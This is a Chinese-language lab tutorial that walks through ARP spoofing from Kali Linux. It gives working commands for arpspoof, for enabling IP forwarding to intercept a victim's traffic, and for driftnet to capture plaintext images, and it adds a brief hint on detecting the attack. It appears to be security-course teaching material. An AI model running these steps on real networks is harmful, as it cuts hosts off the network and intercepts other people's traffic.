网络协议与攻击模拟_03实施ARP欺骗和攻击

一、ARP攻击

1、实验环境

  • kali Linux (安装arpspoof工具)
  • 被攻击主机

2、kali配置

kali Linux系统是基于debian Linux系统,采用deb包管理方式,可以使用apt源的方式进行直接从源的安装。

  • 配置kali网络源

    vim /etc/apt/sources.list

    apt-get-update

  • 安装工具

    apt-get install dsniff

3、实验步骤

(1)准备工作

  • windows虚拟机与kali虚拟机的IP和MAC地址如下:
  • 开始Windows可正常访问网络

(2)实施攻击

复制代码
arpspoof -i eth0 -t 被攻击主机IP地址 被攻击主机网关地址

kali 不停向被攻击主机发送ARP响应,告诉被攻击主机网关的MAC地址是0:c:29:e2:44:49

(3)攻击效果

被攻击主机无法访问网络

  • winshark&arp缓存情况

被攻击主机无法进行网络通信

如果出现了响应报文过多,还跟有可能就是遭受了ARP攻击。

二、实施ARP欺骗

1、开启攻击机的IP转发

开启kali的IP转发

bash 复制代码
vim /proc/sys/net/ipv4/ip_forward
#这个文件写1代表开启,写0代表关闭

echo 1 >> /proc/sys/net/ipv4/ip_forward  

2、被攻击主机可访问网络

  • windows发出的所有数据都会经过kali进行转发。
  • kali自带抓包工具winshark可以抓包看看

如果遇到kali自带的winshark闪退请使用以下命令更新:

bash 复制代码
apt update &&apt upgrade &&apt dist-upgrade

3、driftne监听工具

(抓取被攻击主机上明文的图片)

bash 复制代码
#安装driftnet
apt-get install driftnet
#启用driftnet
driftnet -i ethernet0
相关推荐
辣椒思密达7 小时前
AI出海产品本地化测试:住宅IP在模拟海外用户环境中的实践价值
网络协议·tcp/ip·安全·php·苹果vision pro
花生了什么事o9 小时前
DNS:把域名翻译成 IP 的层级查询机制
网络·网络协议·tcp/ip
2401_8734794011 小时前
金融合规新规下IP查询怎么做?用IP离线库实现数据不出域
网络协议·tcp/ip·金融·ip
微硬创新13 小时前
汽车制造产线协同:耐达讯PROFINETDeviceNet网关在机器人通信中的应用
人工智能·物联网·网络协议·自动化·汽车·制造·信息与通信
米尔的可达鸭13 小时前
深入操作系统 Socket 底层:套接字控制块、FD映射、阻塞IO核心完整实现
arm开发·数据结构·websocket·网络协议·算法·架构·安全架构
Keepingrun14 小时前
http登录和授权
网络·网络协议·http
Lhappy嘻嘻17 小时前
网络初识|基础入门:局域网广域网、IP 端口、TCP/IP 五层模型与封装解封装全过程
java·开发语言·网络·笔记·网络协议·tcp/ip
laoli_coding1 天前
如何配置HTTPS站点访问的免费SSL域名证书
网络协议·https·node.js·ssl
Keepingrun1 天前
HTTP基础
网络·网络协议·http
apihz1 天前
全球域名 WHOIS 信息实时查询免费 API 接口教程,支持1000+后缀
android·网络·网络协议·tcp/ip·apache·域名·whois